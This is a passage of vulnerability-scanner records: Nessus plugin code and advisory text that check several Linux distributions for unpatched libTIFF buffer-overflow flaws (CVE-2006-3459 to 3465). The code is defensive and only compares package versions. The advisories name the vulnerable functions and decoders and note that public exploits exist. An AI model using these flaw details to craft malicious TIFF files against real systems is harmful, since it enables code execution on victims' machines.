\"CVE-2006-3462\", \"CVE-2006-3463\", \"CVE-2006-3464\", \"CVE-2006-3465\");\n script_bugtraq_id(19287);\n script_xref(name:\"GLSA\", value:\"200608-07\");\n\n script_name(english:\"GLSA-200608-07 : libTIFF: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200608-07\n(libTIFF: Multiple vulnerabilities)\n\n Tavis Ormandy of the Google Security Team discovered several heap and\n stack-based buffer overflows and other flaws in libTIFF. The affected parts\n include the TIFFFetchShortPair(), TIFFScanLineSize() and\n EstimateStripByteCounts() functions, and the PixarLog and NeXT RLE\n decoders.\n \nImpact :\n\n A remote attacker could entice a user to open a specially crafted TIFF\n file, resulting in the possible execution of arbitrary code.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200608-07\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All libTIFF users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-libs/tiff-3.8.2-r2'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apple iOS MobileMail LibTIFF Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:tiff\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/08/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/08/07\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/08/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"media-libs/tiff\", unaffected:make_list(\"ge 3.8.2-r2\"), vulnerable:make_list(\"lt 3.8.2-r2\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libTIFF\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:09:39", "bulletinFamily": "scanner", "description": "Tavis Ormandy, Google Security Team, discovered several vulnerabilities the libtiff image processing library :\n\nSeveral buffer overflows have been discovered, including a stack buffer overflow via TIFFFetchShortPair() in tif_dirread.c, which is used to read two unsigned shorts from the input file. While a bounds check is performed via CheckDirCount(), no action is taken on the result allowing a pathological tdir_count to read an arbitrary number of unsigned shorts onto a stack buffer. (CVE-2006-3459)\n\nA heap overflow vulnerability was discovered in the jpeg decoder, where TIFFScanLineSize() is documented to return the size in bytes that a subsequent call to TIFFReadScanline() would write, however the encoded jpeg stream may disagree with these results and overrun the buffer with more data than expected. (CVE-2006-3460)\n\nAnother heap overflow exists in the PixarLog decoder where a run length encoded data stream may specify a stride that is not an exact multiple of the number of samples. The result is that on the final decode operation the destination buffer is overrun, potentially allowing an attacker to execute arbitrary code. (CVE-2006-3461)\n\nThe NeXT RLE decoder was also vulnerable to a heap overflow vulnerability, where no bounds checking was performed on the result of certain RLE decoding operations. This was solved by ensuring the number of pixels written did not exceed the size of the scanline buffer already prepared. (CVE-2006-3462)\n\nAn infinite loop was discovered in EstimateStripByteCounts(), where a 16bit unsigned short was used to iterate over a 32bit unsigned value, should the unsigned int (td_nstrips) have exceeded USHORT_MAX, the loop would never terminate and continue forever. (CVE-2006-3463)\n\nMultiple unchecked arithmetic operations were uncovered, including a number of the range checking operations deisgned to ensure the offsets specified in tiff directories are legitimate. These can be caused to wrap for extreme values, bypassing sanity checks. Additionally, a number of codepaths were uncovered where assertions did not hold true, resulting in the client application calling abort(). (CVE-2006-3464)\n\nA flaw was also uncovered in libtiffs custom tag support, as documented here http://www.libtiff.org/v3.6.0.html. While well formed tiff files must have correctly ordered directories, libtiff attempts to support broken images that do not. However in certain circumstances, creating anonymous fields prior to merging field information from codec information can result in recognised fields with unexpected values. This state results in abnormal behaviour, crashes, or potentially arbitrary code execution. (CVE-2006-3465)\n\nThe updated packages have been patched to correct these issues.", "modified": "2018-07-19T00:00:00", "id": "MANDRAKE_MDKSA-2006-137.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=23886", "published": "2006-12-16T00:00:00", "title": "Mandrake Linux Security Advisory : libtiff (MDKSA-2006:137)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2006:137. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(23886);\n script_version (\"1.18\");\n script_cvs_date(\"Date: 2018/07/19 20:59:14\");\n\n script_cve_id(\"CVE-2006-3459\", \"CVE-2006-3460\", \"CVE-2006-3461\", \"CVE-2006-3462\", \"CVE-2006-3463\", \"CVE-2006-3464\", \"CVE-2006-3465\");\n script_xref(name:\"MDKSA\", value:\"2006:137\");\n\n script_name(english:\"Mandrake Linux Security Advisory : libtiff (MDKSA-2006:137)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Tavis Ormandy, Google Security Team, discovered several\nvulnerabilities the libtiff image processing library :\n\nSeveral buffer overflows have been discovered, including a stack\nbuffer overflow via TIFFFetchShortPair() in tif_dirread.c, which is\nused to read two unsigned shorts from the input file. While a bounds\ncheck is performed via CheckDirCount(), no action is taken on the\nresult allowing a pathological tdir_count to read an arbitrary number\nof unsigned shorts onto a stack buffer. (CVE-2006-3459)\n\nA heap overflow vulnerability was discovered in the jpeg decoder,\nwhere TIFFScanLineSize() is documented to return the size in bytes\nthat a subsequent call to TIFFReadScanline() would write, however the\nencoded jpeg stream may disagree with these results and overrun the\nbuffer with more data than expected. (CVE-2006-3460)\n\nAnother heap overflow exists in the PixarLog decoder where a run\nlength encoded data stream may specify a stride that is not an exact\nmultiple of the number of samples. The result is that on the final\ndecode operation the destination buffer is overrun, potentially\nallowing an attacker to execute arbitrary code. (CVE-2006-3461)\n\nThe NeXT RLE decoder was also vulnerable to a heap overflow\nvulnerability, where no bounds checking was performed on the result of\ncertain RLE decoding operations. This was solved by ensuring the\nnumber of pixels written did not exceed the size of the scanline\nbuffer already prepared. (CVE-2006-3462)\n\nAn infinite loop was discovered in EstimateStripByteCounts(), where a\n16bit unsigned short was used to iterate over a 32bit unsigned value,\nshould the unsigned int (td_nstrips) have exceeded USHORT_MAX, the\nloop would never terminate and continue forever. (CVE-2006-3463)\n\nMultiple unchecked arithmetic operations were uncovered, including a\nnumber of the range checking operations deisgned to ensure the offsets\nspecified in tiff directories are legitimate. These can be caused to\nwrap for extreme values, bypassing sanity checks. Additionally, a\nnumber of codepaths were uncovered where assertions did not hold true,\nresulting in the client application calling abort(). (CVE-2006-3464)\n\nA flaw was also uncovered in libtiffs custom tag support, as\ndocumented here http://www.libtiff.org/v3.6.0.html. While well formed\ntiff files must have correctly ordered directories, libtiff attempts\nto support broken images that do not. However in certain\ncircumstances, creating anonymous fields prior to merging field\ninformation from codec information can result in recognised fields\nwith unexpected values. This state results in abnormal behaviour,\ncrashes, or potentially arbitrary code execution. (CVE-2006-3465)\n\nThe updated packages have been patched to correct these issues.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apple iOS MobileMail LibTIFF Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64tiff3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64tiff3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64tiff3-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libtiff-progs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libtiff3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libtiff3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libtiff3-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2006\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/08/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/12/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2006.0\", cpu:\"x86_64\", reference:\"lib64tiff3-3.6.1-12.6.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", cpu:\"x86_64\", reference:\"lib64tiff3-devel-3.6.1-12.6.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", cpu:\"x86_64\", reference:\"lib64tiff3-static-devel-3.6.1-12.6.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"libtiff-progs-3.6.1-12.6.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", cpu:\"i386\", reference:\"libtiff3-3.6.1-12.6.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", cpu:\"i386\", reference:\"libtiff3-devel-3.6.1-12.6.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", cpu:\"i386\", reference:\"libtiff3-static-devel-3.6.1-12.6.20060mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:09:29", "bulletinFamily": "scanner", "description": "Tavis Ormandy of the Google Security Team discovered several problems in the TIFF library. The Common Vulnerabilities and Exposures project identifies the following issues :\n\n - CVE-2006-3459 Several stack-buffer overflows have been discovered.\n\n - CVE-2006-3460 A heap overflow vulnerability in the JPEG decoder may overrun a buffer with more data than expected.\n\n - CVE-2006-3461 A heap overflow vulnerability in the PixarLog decoder may allow an attacker to execute arbitrary code.\n\n - CVE-2006-3462 A heap overflow vulnerability has been discovered in the NeXT RLE decoder.\n\n - CVE-2006-3463 An loop was discovered where a 16bit unsigned short was used to iterate over a 32bit unsigned value so that the loop would never terminate and continue forever.\n\n - CVE-2006-3464 Multiple unchecked arithmetic operations were uncovered, including a number of the range checking operations designed to ensure the offsets specified in TIFF directories are legitimate.\n\n - CVE-2006-3465 A flaw was also uncovered in libtiffs custom tag support which may result in abnormal behaviour, crashes, or potentially arbitrary code execution.", "modified": "2018-07-20T00:00:00", "id": "DEBIAN_DSA-1137.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=22679", "published": "2006-10-14T00:00:00", "title": "Debian DSA-1137-1 : tiff - several vulnerabilities", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1137. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(22679);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2018/07/20 2:17:12\");\n\n script_cve_id(\"CVE-2006-3459\", \"CVE-2006-3460\", \"CVE-2006-3461\", \"CVE-2006-3462\", \"CVE-2006-3463\", \"CVE-2006-3464\", \"CVE-2006-3465\");\n script_xref(name:\"DSA\", value:\"1137\");\n\n script_name(english:\"Debian DSA-1137-1 : tiff - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Tavis Ormandy of the Google Security Team discovered several problems\nin the TIFF library. The Common Vulnerabilities and Exposures project\nidentifies the following issues :\n\n - CVE-2006-3459\n Several stack-buffer overflows have been discovered.\n\n - CVE-2006-3460\n A heap overflow vulnerability in the JPEG decoder may\n overrun a buffer with more data than expected.\n\n - CVE-2006-3461\n A heap overflow vulnerability in the PixarLog decoder\n may allow an attacker to execute arbitrary code.\n\n - CVE-2006-3462\n A heap overflow vulnerability has been discovered in the\n NeXT RLE decoder.\n\n - CVE-2006-3463\n An loop was discovered where a 16bit unsigned short was\n used to iterate over a 32bit unsigned value so that the\n loop would never terminate and continue forever.\n\n - CVE-2006-3464\n Multiple unchecked arithmetic operations were uncovered,\n including a number of the range checking operations\n designed to ensure the offsets specified in TIFF\n directories are legitimate.\n\n - CVE-2006-3465\n A flaw was also uncovered in libtiffs custom tag support\n which may result in abnormal behaviour, crashes, or\n potentially arbitrary code execution.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-3459\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-3460\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-3461\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-3462\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-3463\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-3464\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-3465\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2006/dsa-1137\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the libtiff packages.\n\nFor the stable distribution (sarge) these problems have been fixed in\nversion 3.7.2-7.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apple iOS MobileMail LibTIFF Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tiff\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/08/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/10/14\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/08/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.1\", prefix:\"libtiff-opengl\", reference:\"3.7.2-7\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"libtiff-tools\", reference:\"3.7.2-7\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"libtiff4\", reference:\"3.7.2-7\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"libtiff4-dev\", reference:\"3.7.2-7\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"libtiffxx0\", reference:\"3.7.2-7\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:09:21", "bulletinFamily": "scanner", "description": "New libtiff packages are available for Slackware 9.0, 9.1, 10.0, 10.1, 10.2, and -current to fix security issues. These issues could be used to crash programs linked to libtiff or possibly to execute code as the program's user. Thanks to Tavis Ormandy and the Google Security Team.", "modified": "2018-06-27T00:00:00", "id": "SLACKWARE_SSA_2006-230-01.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=22236", "published": "2006-08-21T00:00:00", "title": "Slackware 10.0 / 10.1 / 10.2 / 9.0 / 9.1 / current : libtiff (SSA:2006-230-01)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2006-230-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(22236);\n script_version(\"1.17\");\n script_cvs_date(\"Date: 2018/06/27 18:42:26\");\n\n script_cve_id(\"CVE-2006-3459\", \"CVE-2006-3460\", \"CVE-2006-3461\", \"CVE-2006-3462\", \"CVE-2006-3463\", \"CVE-2006-3464\", \"CVE-2006-3465\");\n script_bugtraq_id(19287);\n script_xref(name:\"SSA\", value:\"2006-230-01\");\n\n script_name(english:\"Slackware 10.0 / 10.1 / 10.2 / 9.0 / 9.1 / current : libtiff (SSA:2006-230-01)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New libtiff packages are available for Slackware 9.0, 9.1, 10.0,\n10.1, 10.2, and -current to fix security issues. These issues could be\nused to crash programs linked to libtiff or possibly to execute code\nas the program's user. Thanks to Tavis Ormandy and the Google Security\nTeam.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2006&m=slackware-security.536600\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?27722a90\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libtiff package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apple iOS MobileMail LibTIFF Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:libtiff\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:10.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:10.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:10.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:9.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:9.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/08/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/08/21\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/08/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"9.0\", pkgname:\"libtiff\", pkgver:\"3.8.2\", pkgarch:\"i386\", pkgnum:\"1_slack9.0\")) flag++;\n\nif (slackware_check(osver:\"9.1\", pkgname:\"libtiff\", pkgver:\"3.8.2\", pkgarch:\"i486\", pkgnum:\"1_slack9.1\")) flag++;\n\nif (slackware_check(osver:\"10.0\", pkgname:\"libtiff\", pkgver:\"3.8.2\", pkgarch:\"i486\", pkgnum:\"1_slack10.0\")) flag++;\n\nif (slackware_check(osver:\"10.1\", pkgname:\"libtiff\", pkgver:\"3.8.2\", pkgarch:\"i486\", pkgnum:\"1_slack10.1\")) flag++;\n\nif (slackware_check(osver:\"10.2\", pkgname:\"libtiff\", pkgver:\"3.8.2\", pkgarch:\"i486\", pkgnum:\"1_slack10.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"libtiff\", pkgver:\"3.8.2\", pkgarch:\"i486\", pkgnum:\"2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:10:20", "bulletinFamily": "scanner", "description": "Tavis Ormandy discovered that the TIFF library did not sufficiently check handled images for validity. By tricking an user or an automated system into processing a specially crafted TIFF image, an attacker could exploit these weaknesses to execute arbitrary code with the target application's privileges.\n\nThis library is used in many client and server applications, thus you should reboot your computer after the upgrade to ensure that all running programs use the new version of the library.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-12-01T00:00:00", "id": "UBUNTU_USN-330-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=27909", "published": "2007-11-10T00:00:00", "title": "Ubuntu 5.04 / 5.10 / 6.06 LTS : tiff vulnerabilities (USN-330-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-330-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(27909);\n script_version(\"1.17\");\n script_cvs_date(\"Date: 2018/12/01 15:12:38\");\n\n script_cve_id(\"CVE-2006-3459\", \"CVE-2006-3460\", \"CVE-2006-3461\", \"CVE-2006-3462\", \"CVE-2006-3463\", \"CVE-2006-3464\", \"CVE-2006-3465\");\n script_xref(name:\"USN\", value:\"330-1\");\n\n script_name(english:\"Ubuntu 5.04 / 5.10 / 6.06 LTS : tiff vulnerabilities (USN-330-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Tavis Ormandy discovered that the TIFF library did not sufficiently\ncheck handled images for validity. By tricking an user or an automated\nsystem into processing a specially crafted TIFF image, an attacker\ncould exploit these weaknesses to execute arbitrary code with the\ntarget application's privileges.\n\nThis library is used in many client and server applications, thus you\nshould reboot your computer after the upgrade to ensure that all\nrunning programs use the new version of the library.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/330-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apple iOS MobileMail LibTIFF Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libtiff-opengl\");\n 